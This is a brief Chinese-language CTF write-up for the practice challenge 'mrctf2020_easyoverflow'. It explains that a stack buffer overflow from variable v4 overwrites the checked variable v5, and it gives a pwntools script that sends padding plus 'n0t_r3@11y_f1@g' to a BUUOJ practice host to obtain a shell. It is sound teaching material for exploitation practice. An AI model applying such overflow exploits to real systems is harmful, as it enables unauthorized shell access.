mrctf2020_easyoverflow

这道题就是纸老虎
保护全开

看主程序

完成check就可以直接system（'/bin/sh')
check看一下

就是要等于这个玩意就是
可是看回主程序，这里输入的是v4，判断的v5，这里想起来了局部变量在栈上是按顺序排下来的，两个一个距离ebp是0x70一个是0x40减一下就好了

点击查看代码

from pwn import *
io=remote("node4.buuoj.cn",28424)
payload='a'*(0x70-0x40)+'n0t_r3@11y_f1@g'
io.sendline(payload)
io.interactive()